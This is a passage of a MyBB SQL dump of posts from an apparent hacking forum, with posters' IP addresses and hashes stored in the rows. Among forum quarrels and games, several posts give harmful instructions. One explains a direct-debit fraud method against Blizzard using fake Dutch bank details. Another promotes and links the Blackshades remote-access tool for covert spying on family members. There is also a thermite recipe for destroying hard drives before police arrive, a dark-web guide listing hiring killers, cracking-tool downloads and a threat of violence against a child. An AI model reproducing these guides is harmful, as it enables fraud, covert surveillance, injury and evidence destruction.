$5. And now you changed your mind again and said close it.. What the hell. Are you trying to like spam threads making your post go up or something. Just leave the forum....', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f82af900e4d3e720df3ff6cc91656990', '0', '0'); INSERT INTO mybb_posts VALUES('3386', '253', '1106', '56', 'RE: Count to 200', '0', '100', '??zg???g????61', '1349393842', '43. iTziPod is awesome <3', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'dd1cc295d1a24688764ea440c13f463f', '0', '0'); INSERT INTO mybb_posts VALUES('3387', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '61', 'NXK', '1349395776', 'You act like you\'re 12 and make 2 different threads to bitch in.\n\nNo one wants an immature admin.', '99.253.94.204', '1677549260', '1', '0', '61', '1349396549', '1', '0a7cf39f43495c70ff3d9b3d3da8b4ec', '0', '1349396549'); INSERT INTO mybb_posts VALUES('3388', '662', '3387', '7', 'RE: Is this how you treat me?', '0', '203', 'NeonLights', '1349395901', '[quote=\'NXK\' pid=\'3387\' dateline=\'1349395776\']\nYou act like you\'re 12 and make 2 different threads to bitch in.\n\nNo one wants an immature admin.\n[/quote]\n\ni simply agree to mister NXK', '67.68.75.193', '1128549313', '1', '0', '61', '1349396611', '1', '311f8267fb9aa1e0a106959209950115', '0', '1349396611'); INSERT INTO mybb_posts VALUES('3389', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349396394', '44. I\'m an iPod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6f1385a1e429383dc9633432f4628053', '0', '0'); INSERT INTO mybb_posts VALUES('3390', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '82', 'iTzIpod', '1349396437', 'I hope you get repfucked bro.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '581e4e9e96f9264b1ce0cce826c8ffa4', '0', '0'); INSERT INTO mybb_posts VALUES('3391', '667', '0', '7', 'can you guys help me spread?', '0', '203', 'NeonLights', '1349400907', 'Edit: removed thread, cuz there might be a fucktard on here... :P', '67.68.75.193', '1128549313', '1', '0', '203', '1349401851', '1', 'fe504229d830441c9f7155b228b83a3a', '0', '1349401851'); INSERT INTO mybb_posts VALUES('3396', '667', '3395', '7', 'RE: can you guys help me spread?', '0', '61', 'NXK', '1349402139', '[quote=\'NeonLights\' pid=\'3395\' dateline=\'1349401816\']\r\n[quote=\'NXK\' pid=\'3392\' dateline=\'1349401140\']\r\nRemove your actual JDB link Now.\r\n\r\nI\'ve done it for you, don\'t do that again incase a member doesn\'t read OP and actually downloads it by accident\r\n[/quote]\r\n\r\nit doesnt even download anything\r\nu need to press execute twice...\r\nand if someone is that dumb then be it LMAO il close the thread and removed link\r\n[/quote]\r\nI removed the link for you.. you didn\'t have to close thread. read lol.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a19a54eeb1a4947c8ddb3f942327f25c', '0', '0'); INSERT INTO mybb_posts VALUES('3397', '661', '3303', '50', 'RE: Bullshit', '0', '1', 't3h jok3r', '1349403949', '1. Thanks for making this complaint in the private forum.\n2. I pruned the logs yesterday but when I logged off I\'m 100% sure that you were a Staff member. I checked the logs and no one edited your profile, I can provide a screenshot if you would like.\n\n[b]Edited[/b]\n\nI checked the Moderator log and NXK can verify this. I lifted the ban on your account in other words removed the ban completely. When I unbanned you I originally changed the usergroup which somewhat restricted you from accessing some stuff because the system still thought you were banned so when I completely unbanned you, it auto brought you down to normal members.', '72.231.24.165', '1223104677', '1', '0', '1', '1349404049', '1', '0af093d8f23395eb9062b2150a61b2c8', '0', '1349404049'); INSERT INTO mybb_posts VALUES('3398', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '203', 'NeonLights', '1349404311', 'HOLY FUCK SO I CAN GET CAUGHT? I USE GOOGLE CHROME FOR EVERYTHING EVEN BLACKHAT ACTVITY HOLY FUCK', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'c2d816242701f7ea54f090e6382e0b0c', '0', '0'); INSERT INTO mybb_posts VALUES('3399', '667', '3391', '7', 'RE: can you guys help me spread?', '0', '1', 't3h jok3r', '1349404503', 'As NXK said, the thread does not need to be closed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '85e5e7c76f8aba4fb1302adf06ef152d', '0', '0'); INSERT INTO mybb_posts VALUES('3393', '652', '3366', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349401264', '[quote=\'NeonLights\' pid=\'3366\' dateline=\'1349388628\']\r\n[quote=\'NXK\' pid=\'3227\' dateline=\'1349235386\']\r\nWhere do you live, If you\'re in ontario Ill just come to your school with my friends and beat this kid up. how about that..\r\n[/quote]\r\n\r\nO SNAAAAPPPPPP CAREFUL GUYS!!! HIPSTER TALKING SMACK!\r\n \r\n\r\nlol... u leave in ontario? :D i live not to far from there\r\nim in montreal\r\n[/quote]\r\nI\'m far from hipstir..\r\nlol. where the fuck did you get that idea?', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '40302f9a6d7b33949460999a3a03e096', '0', '0'); INSERT INTO mybb_posts VALUES('3392', '667', '3391', '7', 'RE: can you guys help me spread?', '0', '61', 'NXK', '1349401140', 'Remove your actual JDB link Now.\n\nI\'ve done it for you, don\'t do that again incase a member doesn\'t read OP and actually downloads it by accident', '99.253.94.204', '1677549260', '1', '0', '61', '1349401191', '1', '21ebb87bf79907d5a2c5197f19f69a50', '0', '1349401191'); INSERT INTO mybb_posts VALUES('3394', '652', '3393', '7', 'RE: Being CyberBullied', '0', '203', 'NeonLights', '1349401538', '[quote=\'NXK\' pid=\'3393\' dateline=\'1349401264\']\r\n[quote=\'NeonLights\' pid=\'3366\' dateline=\'1349388628\']\r\n[quote=\'NXK\' pid=\'3227\' dateline=\'1349235386\']\r\nWhere do you live, If you\'re in ontario Ill just come to your school with my friends and beat this kid up. how about that..\r\n[/quote]\r\n\r\nO SNAAAAPPPPPP CAREFUL GUYS!!! HIPSTER TALKING SMACK!\r\n \r\n\r\nlol... u leave in ontario? :D i live not to far from there\r\nim in montreal\r\n[/quote]\r\nI\'m far from hipstir..\r\nlol. where the fuck did you get that idea?\r\n[/quote]\r\n\r\nLMAO, idk just messing around hahahah', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '6a33ac8c72caff29407c3143e842fb4c', '0', '0'); INSERT INTO mybb_posts VALUES('3395', '667', '3392', '7', 'RE: can you guys help me spread?', '0', '203', 'NeonLights', '1349401816', '[quote=\'NXK\' pid=\'3392\' dateline=\'1349401140\']\r\nRemove your actual JDB link Now.\r\n\r\nI\'ve done it for you, don\'t do that again incase a member doesn\'t read OP and actually downloads it by accident\r\n[/quote]\r\n\r\nit doesnt even download anything\r\nu need to press execute twice...\r\nand if someone is that dumb then be it LMAO il close the thread and removed link', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '0b34332c0e155949ca1476e24c2fdfa0', '0', '0'); INSERT INTO mybb_posts VALUES('3400', '51', '3398', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '1', 't3h jok3r', '1349404729', '[quote=\'NeonLights\' pid=\'3398\' dateline=\'1349404311\']\r\nHOLY FUCK SO I CAN GET CAUGHT? I USE GOOGLE CHROME FOR EVERYTHING EVEN BLACKHAT ACTVITY HOLY FUCK\r\n[/quote]\r\n\r\nNot really but Firefox is good for blackhat stuff and Google Chrome blocks some elements and popouts so stuff such as XSS or SQL Injection can\'t be performed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7a1190adeec73bfecce8d7389d81df44', '0', '0'); INSERT INTO mybb_posts VALUES('3401', '667', '3399', '7', 'RE: can you guys help me spread?', '0', '203', 'NeonLights', '1349405079', '[quote=\'t3h jok3r\' pid=\'3399\' dateline=\'1349404503\']\r\nAs NXK said, the thread does not need to be closed.\r\n[/quote]\r\n \r\n\r\nits a useless thread why would i leave it here if i cant give the link to my jdb for ppl to spread it...\r\nno point on leaving the thread here', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '578de6bc5404b4053af4380ed13f7ca4', '0', '0'); INSERT INTO mybb_posts VALUES('3402', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '1', 't3h jok3r', '1349405277', 'Congratulations I promoted you again after the website error but after your constant spamming I have demoted you once again. You are now banned from becoming a Mod, Staff or Admin. If you DDoS LH then I will send a report to your ISP and if you try to use the Skype Resolver on me then it won\'t work because I\'m always on a VPN.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e7db5544589c14b3491141f00b599b39', '0', '0'); INSERT INTO mybb_posts VALUES('3404', '669', '0', '12', 'Hacking: The Art of Exploitation, 2nd Edition', '0', '203', 'NeonLights', '1349405460', 'no longer here threads useless', '67.68.75.193', '1128549313', '1', '0', '203', '1349919470', '1', '1ada9bbe5e3044cee48715c7e4bf046c', '0', '1349919470'); INSERT INTO mybb_posts VALUES('4186', '803', '0', '4', 'bye LH fun knowing u', '2', '203', 'NeonLights', '1349919588', 'bye guys im leaving LH\r\nit was a fun journey until some things just snapped\r\nim no longer able to login to my skype or this forum without\r\ngetting pms or message saying im a buttfuck\r\nso have fun im gone and i aint gonna change my mind\r\nBYE\n[hr]\nthe disrespect that ppl have these days im leaving a forum no one even cares...\ni dont even know why i joined this place :\'(\n\ni tell ppl im leaving and they auto kick out of there skype chats so fuck it', '67.68.75.160', '1128549280', '1', '0', '1', '1349919789', '1', '234fa9524b7397205d20081bb2597914', '0', '1349919789'); INSERT INTO mybb_posts VALUES('4187', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '1', 't3h jok3r', '1349919731', 'Umm also add this to the OP.\n\n[quote=\'NeonLights\']\n[quote=\'t3h jok3r\']\n[quote=\'NeonLights\']\nok so im already pissed\nand now i noticed my gourp section is deleted and al my fucking threads that i made also -.-\ntook me for fucking ever to make...\n[/quote]\n\nGuess what, you fucking accessed the staff section which you weren\'t suppose to then I investigated what was the fucking case then I found that I needed to fucking re-make your group. I\'m not in the mood today so didn\'t think of anything so re-made your goddamn group and went offline. Now you need fucking permission to access forums and I forgot to edit it.\n\nYou want to fucking have attitude then go for it because now ratters will have a new leader.\n[/quote]\n\nfine be that way get a new leader im leaving the forums if u wanna be a shit fuck like this...\nand there was nothing in that section and its ur fault so dont get moody for shit...\n[/quote]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '10aafaad1e8d994d813ef167ae4bcf80', '0', '0'); INSERT INTO mybb_posts VALUES('4189', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '3', '??????????¢™', '1349919904', 'Your leaving so why should you deserve to be in the group chat? BYE!', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'bf20dbdd80f168de57b68b7155e97131', '0', '0'); INSERT INTO mybb_posts VALUES('4190', '776', '4012', '16', 'RE: What are some things you want SE\'d?', '0', '1', 't3h jok3r', '1349919919', 'There\'s nothing that I want SE\'d at the moment but maybe you can create a guide on SEing phones.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '22bd78176172c219f3bf2bdbe301b33f', '0', '0'); INSERT INTO mybb_posts VALUES('4191', '776', '4190', '16', 'RE: What are some things you want SE\'d?', '0', '61', 'NXK', '1349920231', '[quote=\'t3h jok3r\' pid=\'4190\' dateline=\'1349919919\']\r\nThere\'s nothing that I want SE\'d at the moment but maybe you can create a guide on SEing phones.\r\n[/quote]\r\nHmm I\'ve done this before, ill think about making a guide for this over the weekend.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '00541493760b3ed30b3491c7f70f5bb9', '0', '0'); INSERT INTO mybb_posts VALUES('3405', '652', '3342', '7', 'RE: Being CyberBullied', '0', '1', 't3h jok3r', '1349405476', '[quote=\'iTzGRONgamer61\' pid=\'3342\' dateline=\'1349375161\']\r\n[quote=\'NXK\' pid=\'3263\' dateline=\'1349303023\']\r\n\r\nEveryones IP\'s are logged on this site\r\n\r\nIt\'s public information. No one can hide.\r\n[/quote]\r\n\r\n\r\nI always use a VPN, and if for some reason my main VPN\'s server is down, I have a backup xDDD\r\n[/quote]\r\n\r\n\r\nBut I have your real IP through Cloudflare remember? LOL don\'t worry I won\'t abuse it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1a878477321ebd447ba7598b5b77c7b8', '0', '0'); INSERT INTO mybb_posts VALUES('3406', '643', '3333', '7', 'RE: L33thakcers.com members here?', '0', '1', 't3h jok3r', '1349405549', '[quote=\'o_o\' pid=\'3333\' dateline=\'1349363635\']\r\nI thought that this was the l33thackers forum thats why I registered now I just noticed that it isn\'t, I\'ll just stay here and see how it goes\r\n[/quote]\r\n\r\nHope you like l33thacking. BTW did anyone refer you here or tell you that this is the new l33thackers site?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cf9f4e3e7c1be8f6a81b2e5b34b0438a', '0', '0'); INSERT INTO mybb_posts VALUES('3407', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1349405826', 'We\'re on position # 11. Not bad, thanks for all the votes people.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7d5edaef497afd15e4dc66fc47547ae4', '0', '0'); INSERT INTO mybb_posts VALUES('3408', '670', '0', '16', '[Guide]How to get free Blizzard games/products.', '0', '5', 'Timmy', '1349407976', 'Hello there, I\'ll be teaching you how to get free Blizzard games or products by a simple method.\n\nI don\'t know how long this method will still be working though!!!\n\nAlright let\'s get started.\n\nWe\'ll be using the Direct Debit Fraud method which can be only used on Blizzard products if your Battle.net Account is Dutch.\n\nRequirements:\n• A Battle.net account with the country set as: \'The Netherlands\'.\n• A brain\n• A Dutch VPN\n\nThen follow me now, do the following steps:\n• Login into your Battle.net account\n• Go to the account management (right in the corner where it\'s saying \'Account\'.)\n• Click buy Digital Games\n• Pick a game you want to buy (ex: Diablo 3)\n• Now you\'ll see a payment method called \'Automatische Incasso(Direct Debit)\'. click on it.\n\nNow the important things are coming, bank number, bank account etc.\n\n• Fill in at \'Bank Name\': \"ING\" without \"\n• Then as account number something like: \"277863\" If it\'s srated with \"27\"\n• Then as \'Bank account holder name\' fill in a Dutch name like: \'Moreno Klaas\' it really doesn\'t matter as long it is Dutch.\n• Then check \'Use my current contact information\'\n• Click continue.\n\nNow you have your game activated and you can play it.\n\nAlso remember this is fraud, you basicly trick the Blizzard purchasing system.\n\nI\'ve tried this method and bought DIABLO 3, I have it 2 months and it hasn\'t been disabled yet, so I don\'t know for how long it will stay as this.\n\n\nI hope you guys enjoy my tutorial, and so no more SEing Blizzard products just do it like this, and feel like a Sir.\n\n\nThanks for reading!', '72.231.24.165', '1223104677', '1', '0', '5', '1349408002', '1', '25b6510ea701a89ddf31b1c5b3733432', '0', '1349408002'); INSERT INTO mybb_posts VALUES('3409', '672', '0', '30', 'Blackshades NET [Setup + download]', '0', '5', 'Timmy', '1349408107', '[size=medium][color=#A9A9A9]What is Blackshades?[/color][/size]\nBlackshades is a remote access tool, much like Teamviewer, etc... It allows a user to discretely access multiple other machines remotely and manage them. It provides webcam access, file access, and the ability to monitor keystrokes. Since it allows stealthy access, it allows you to monitor another computer without them knowing. If you want to monitor your child or wife\'s web activity, it\'s perfect. Because of the many features this tool has, it has a history of being used for illegal purposes. I won\'t discuss it\'s illegal uses, purely because I\'m an administrator, but I\'m sure you guys can learn more if you use [url=http://www.Google.com]Google[/url].\n\n[size=medium][color=#A9A9A9]Where can I get Blackshades?[/color][/size]\nAlthough many cracks of the software have circulated around, it is notable that they are most likely infected copies. I recommend you purchase the software from the developers at [url=http://www.bshades.eu]Bshades.eu[/url] since the files won\'t be infected, and you can feel warm and fuzzy about helping them out. I won\'t give links to any cracks, but I\'m sure you can find one if you look around enough. It will almost definitely be infected though. You can also use the Lite version offered on their site, but it has limitations. The software from [url=http://www.bshades.eu]Bshades.eu[/url] is ~$50.00 USD, which isn\'t much considering what you can gain.\n\n[color=#A9A9A9][size=medium]Setting it up, Part I[/size] (by [url=http://www.youtube.com/user/LegitSezmic]LegitSezmic[/url])[/color][video=youtube]http://www.youtube.com/watch?v=H9eQkO2StnA[/video]\n\n[color=#A9A9A9][size=medium]Setting it up, Part II[/size] (by [url=http://www.youtube.com/user/LegitSezmic]LegitSezmic[/url])[/color][video=youtube]http://www.youtube.com/watch?v=3T2Q_ctHCDk[/video]\n\n[b]Edited[/b]\n\nDownload: http://l33thacking.net/thread-142.html\n\n\nScan before running file.', '72.231.24.165', '1223104677', '1', '0', '5', '1349408180', '1', '26407c9ca92069444d4933c57eacfc5e', '0', '1349408180'); INSERT INTO mybb_posts VALUES('3410', '673', '0', '29', 'The only allowed \"how to deep web\" tutorial here.', '0', '5', 'Timmy', '1349408360', 'Hi everyone,\r\n\r\nSome of you may and some of you may not have heard of the \"Dark Web\" or \"Deep Web\", there are many names for it, but basically the Dark Web is a place for hackers, drug dealers, and pretty much everything illegal can be discussed or sold on here.\r\n\r\n\r\n[u][b]Here are some facts on The Deep Web:[/b][/u]\r\n\r\n[color=#FFD700] - Public information on the deep Web is currently 400 to 550 times larger than the commonly defined World Wide Web.\r\n\r\n - The deep Web contains 7,500 terabytes of information compared to 19 terabytes of information in the surface Web.\r\n\r\n - The deep Web contains nearly 550 billion individual documents compared to the 1 billion of the surface Web.[/color]\r\n\r\n[u][b]What can you do on the Dark Web?[/b][/u]\r\n[color=#FFD700][list]\r\n[*]Hire Killers\r\n[*]Pay into Fixed betting events\r\n[*]Hire a hacker\r\n[*]Use anonymous email services\r\n[*]Buy and Sell Drugs\r\n[*]Buy and Sell Weapons\r\nand much more!\r\n[/list][/color]\r\n\r\nNow after reading about just SOME of the things you can access on the Dark Web, you may be asking. Is it safe?. The answer to that really depends on what you define as safe, if you mean safe as in will you get into trouble for going onto the Dark Web? No you wont; you are allowed to do this, but purchasing illegal items such as Drugs or downloading CP could increase your chances of being arrested. \r\n\r\nAlthough what you may all like to hear is that Tor is anonymous and it is very hard to be traced on Tor. Tor is not only used to access the Dark Web, it can be used to access sites like thepiratebay.se which many UK ISPs have blocked, but if you go through Tor you can connect.\r\nFor information on how [u]Tor[/u] works you can go [url=https://www.torproject.org/about/overview.html.en#stayinganonymous]Here[/url]\r\nFor more information on the [u]Dark Web[/u] you can go [url=http://en.wikipedia.org/wiki/Deep_web]Here[/url]\r\n\r\n[u][b]How to access it?[/b][/u]\r\n[list=1]\r\n[color=#FFD700][*]You need to download a Tor Browser which you can get [url=https://www.torproject.org/download/download-easy.html.en]Here[/url]\r\n[*]Once downloaded you will need to \"Start Tor\", you will then be connected to the Tor Network and will be able to access .onion links\r\n[*]In the address bar copy and paste this URL --> kpvz7ki2v5agwt35.onion\r\n[*]Thats it, you are now on the home page of the hidden Wiki. I will leave the rest to you to decide what you do next. Enjoy[/color]\r\n[/list]\r\n\r\n[i][b][color=#FF0000]Disclaimer: I am not responsible for what you do on the Dark Web. I have provided this tutorial for educational purposes only.[/color][/b][/i]\r\n\r\nThis tutorial belongs to EquinoxRhyme', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '37de5c0743501832001c6873f7732bdd', '0', '0'); INSERT INTO mybb_posts VALUES('3411', '584', '2846', '24', 'RE: Windows 8, will you switch over?', '0', '9', 'p420', '1349408547', 'What are the new and cool stuff in windows 9?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e01c8dabbfafc9023b5a656b8f0f5013', '0', '0'); INSERT INTO mybb_posts VALUES('3412', '674', '0', '24', 'Oh NO! Learn how to destroy your hard drive completely', '0', '9', 'p420', '1349408586', '[align=center][color=#FF4500][size=x-large]How to FULLY Destroy a Hard Drive[/size][/color][/align]\r\n[align=center][color=#1E90FF][b]By BaneKitty[/b][/color][/align]\r\n\r\n[align=left][color=#1E90FF]The day may come when you need to destroy your hard drive, sadly. No matter what people say, the government HAS to have ways of getting your information off your hard drive. Whether it\'s brute forcing with a NSA supercomputer, or just simply using some l33t tool that only the government has, they get information off of computers.\r\n\r\nBy the way, this isn\'t my idea, but I\'m adding some things onto the previous guys idea on another forum.\r\n\r\nIn the event this does happen, and you hear knocking on your front door, you need to do something with your hard drive.\r\n\r\nYou can smash your hard drive with a hammer, dump it in water, hell, even boil it. But, data can be pulled off of it.\r\n\r\nSo, here is a method 100% working to successfully destroy your hard drive. It will always work. What we\'re going to do is basically turn it into a liquid metal with thermite.\r\n\r\nDO THIS OUTSIDE OF A BUILDING!\r\n\r\nThermite isn\'t able to be put out once ignited, plain and simple. This also means that once it starts burning, if you get any body part in it, say goodbye to that body part. You need a brain for this.\r\n\r\nThe most important part is do not panic or rush. If you panic or rush, you may make mistakes. Worst thing you can do is light yourself on fire.\r\n\r\n[size=large][align=center][color=#FF4500]Ingredients needed:[/color][/align][/size]\r\n\r\n[align=center][list]\r\n[*]Flower pot (medium sized for one hard drive)\r\n[*]Powdered iron oxide\r\n[*]Powdered aluminum\r\n[*]Magnesium strip OR blowtorch\r\n[*]Matches\r\n[/list][/align]\r\n\r\nThese materials are widely available, I recommend buying online and sending it to a drop house though. That\'s just me personally, you don\'t want to FBI to know you have those materials and SWAT you so you don\'t have time to burn shit.\r\n\r\nFlower pot is what you\'re going to stick it all in.\r\n\r\nThe iron oxide must be powdered. Same for the aluminum. \r\n\r\n[size=large][align=center][color=#FF4500]Instructions:[/color][/align][/size]\r\n\r\n[align=center]1. Take 8 grams of powdered aluminum to every 3 grams of powdered iron oxide together in a flower pot.\r\n2. Do step one until your flower pot is full.\r\n3. Stick your hard drive in the middle of this mixture.\r\n4. Stick the magnesium strip in the mixture so that half is protruding out.\r\n5. Light the magnesium strip with matches.\r\n6. Run. No joke. Run.[/align]\r\n\r\n[align=center][color=#FF4500]OR if you have a blowtorch:[/color][/align]\r\n\r\n[align=center]1. Take 8 grams of powdered aluminum to every 3 grams of powdered iron oxide together in a flower pot.\r\n2. Do step one until your flower pot is full.\r\n3. Stick your hard drive in the middle of this mixture.\r\n4. Stick the magnesium strip in the mixture so that half is protruding out.\r\n5. Light the magnesium strip with your blow torch.\r\n6. Run. No joke. Run.[/align]\r\n\r\n\r\nGood luck guys, hopefully this situation will never happen to any of us, but if it does, you\'re prepared.\r\n\r\nWiping takes a long time, encryption is good, but destruction is perfect.\r\n\r\n[i][color=#FF4500][align=center]Perfection is key, men.\r\n[/align][/color][/i]\r\n[/color][/align]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '9c3dfed488b5db7a5c9cf4ca56c8c177', '0', '0'); INSERT INTO mybb_posts VALUES('3413', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '10', 'swa4567', '1349409088', 'They have the same theme and similar URL so people think it\'s the same forum.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1b7fa6b6e3ef93719f53f9c88c7c48c0', '0', '0'); INSERT INTO mybb_posts VALUES('3414', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '10', 'swa4567', '1349409168', 'After this thread you have clarified that you don\'t respect LH and neither the admin (Jok3r) otherwise you would have PM\'d him or created a thread in the complaints forum.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '845456b56e728e25b046567d5efd0022', '0', '0'); INSERT INTO mybb_posts VALUES('3415', '253', '1106', '56', 'RE: Count to 200', '0', '10', 'swa4567', '1349409278', '45. Hahaha I got an odd number :P', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '4807448936e28d7a242ba81f6a8ac71b', '0', '0'); INSERT INTO mybb_posts VALUES('3416', '487', '2354', '56', 'RE: Corrupt a wish', '0', '10', 'swa4567', '1349409389', 'Declined because no one declined a wish in this thread :P\n\nI wish I was a smart guy like joker.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '568a0517be9babaf8ffaa057b113c8d6', '0', '0'); INSERT INTO mybb_posts VALUES('3417', '238', '1021', '56', 'RE: Ban the user above you', '0', '10', 'swa4567', '1349409437', 'Banned for having your PSN in your sig.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3b1705a0dd4b106b372db24a5995beee', '0', '0'); INSERT INTO mybb_posts VALUES('3418', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '4', 'Triple H', '1349409560', 'I agree with aathy theres to0o0o0 much space and try to add like a design or symbol.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9b63b9e7b3e7614f1fbb10b6390a73f8', '0', '0'); INSERT INTO mybb_posts VALUES('3419', '674', '3412', '24', 'RE: Oh NO! Learn how to destroy your hard drive completely', '0', '4', 'Triple H', '1349409608', 'Well-written guide Bane thanks for writing this. Useful for every hacker hat.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '03eaac727b3e144ef3e901744daf2117', '0', '0'); INSERT INTO mybb_posts VALUES('3420', '670', '3408', '16', 'RE: [Guide]How to get free Blizzard games/products.', '0', '4', 'Triple H', '1349409791', 'I won\'t be giving this a try but thanks for contributing and looks convincing.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '35caa5c6e9b3e855a494dc82d3e3fe1e', '0', '0'); INSERT INTO mybb_posts VALUES('3421', '627', '3350', '33', 'RE: What can I do to improve this?', '0', '2', 'Apathy', '1349409958', '[quote=\'iTzIpod\' pid=\'3350\' dateline=\'1349378135\']\r\nCan you give me more tips? Like if I restart it, then what would I do then?\r\nAnd no shit that there is way too much empty space... -.- That\'s why I asked if someone could help me.\r\n[/quote]\r\n\r\nYou should not answer Constructive criticism in that manner. Place it just to the right oh the middle. Add more effects such as c4d\'s as well. It is quite bland. Do not go with that type o just plain very beginner smudge tag. Spruce it up with color and other elements. Also use flow.', '173.206.137.176', '-1378973264', '0', '0', '0', '0', '1', 'fb8e0d4cc53a31aaf8b3f22566db7a29', '0', '0'); INSERT INTO mybb_posts VALUES('3422', '674', '3412', '24', 'RE: Oh NO! Learn how to destroy your hard drive completely', '0', '2', 'Apathy', '1349410143', 'I remember reading this a long time ago. Thanks for reminding me about it..', '173.206.137.176', '-1378973264', '0', '0', '0', '0', '1', '47bef40ca8e7daf17b685f9fae2a139e', '0', '0'); INSERT INTO mybb_posts VALUES('3423', '673', '3410', '29', 'RE: The only allowed \"how to deep web\" tutorial here.', '0', '2', 'Apathy', '1349410414', 'A nice tutorial. Thanks for the share. :)', '173.206.137.176', '-1378973264', '0', '0', '0', '0', '1', '7636f056c070abefb12aa87ac40f8773', '0', '0'); INSERT INTO mybb_posts VALUES('3424', '659', '3293', '64', 'RE: Stolen (2012) Movie RIP', '0', '1', 't3h jok3r', '1349410450', 'Some people say that it\'s a racism movie but some people like it. I\'m confused :(', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7e0444854377aa2c507b52dc456b9e16', '0', '0'); INSERT INTO mybb_posts VALUES('3425', '654', '3329', '9', 'RE: Make money typing captchas', '0', '1', 't3h jok3r', '1349410632', '[quote=\'iTzIpod\' pid=\'3329\' dateline=\'1349352046\']\r\nI don\'t know. I just remember I posted this thread... Not even sure now... :/\r\n\r\nDid it get deleted?\r\n[/quote]\r\n\r\nMaybe you posted when we had to move to a new server and I had a old backup.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '50aa4f6bbe26c94b00fb8f9445174cfd', '0', '0'); INSERT INTO mybb_posts VALUES('3426', '675', '0', '65', 'The Julian Assange Story', '0', '205', 'mothered', '1349413453', 'Greetz everyone,\r\n\r\nWhere I reside In Australia, the Julian Assange story will go to air this Sunday. I\'m pretty excited and looking forward to watching It.\r\n\r\nHere\'s a sneak peak:\r\n[video=youtube]http://www.youtube.com/watch?v=iGp3mUIemL0[/video]\r\n\r\nThe ressemblance between the actor and Julian Is amazing.\r\nWhat do you think?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '35ea9bd4e4e070e96b0ccb0f1040fc86', '0', '0'); INSERT INTO mybb_posts VALUES('3427', '676', '0', '12', 'Cracking Tuts/Reverse Enginnering', '0', '205', 'mothered', '1349414067', 'Greetings to all,\r\n\r\nI have collected a few tutorials, that guide you through cracking programs and applications. All cracking tools are provided, as well as the target programs. They cover the absolute beginning to the more advanced.\r\nThey are old, but perfect for someone who wishes to get Into the scene, then can further their skills via their own volition.\r\n\r\n[b][color=#DAA520][u]Tutorials:[/u][/color][/b]\r\n[b]** Serial Fishing\r\n** Internal Keygen\r\n** Unpacking & Patching\r\n** Unpacking & Patching (A more complex case)\r\n** Inline Patching\r\n** Packers Theory\r\n** Cracking Lost Marble\'s Moho\r\n** Breakpoints Theory\r\n** Defeating Magic Byte Protection\r\n** Anti-Tampering Techniques Theory[/b]\r\n\r\n[b][color=#DAA520][u]Tools:[/u][/color][/b]\r\n[b]** Olly Dbg v1.1\r\n** Olly Dbg Plugins\r\n** Diablos 2002 Unversal patcher\r\n** Hex Workshop v3.2\r\n** Import reconstructor v1.6\r\n** PEID v0.94\r\n** Hex Workshop v4.3\r\n** W32Dasm Disassembler/Debugger\r\n** Armadillo Unpacker[/b]\r\n\r\n[b][color=#DAA520]PLEASE NOTE:[/color][/b] Due to the nature of the cracking tools, some Antivirus software may alert. If sceptical, run In a VM or Sandboxie, but the tools are clean.\r\n\r\n[b][color=#DAA520]Download:[/color][/b] http://www.mediafire.com/?at9q6ere2cllkp1', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd4cb57a5f75fe5fde633f2df356a8948', '0', '0'); INSERT INTO mybb_posts VALUES('3428', '677', '0', '24', 'Windows Memory Limits', '0', '205', 'mothered', '1349414429', 'Greetz to all,\r\n\r\nSo let\'s say you have a lappy with 16GB of ram (Like me), and have the x64 architecture Installed to support the ram\'s capacity. That\'ll be fine yeah? Wrong. Different editions of Windows 7 have different memory limits, hence the less superior 64 Bit editions, may not support the Installed ram.\r\nThis also applies Vista.\r\n\r\nRead about It here: http://msdn.microsoft.com/en-us/library/aa366778(v=vs.85).aspx', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 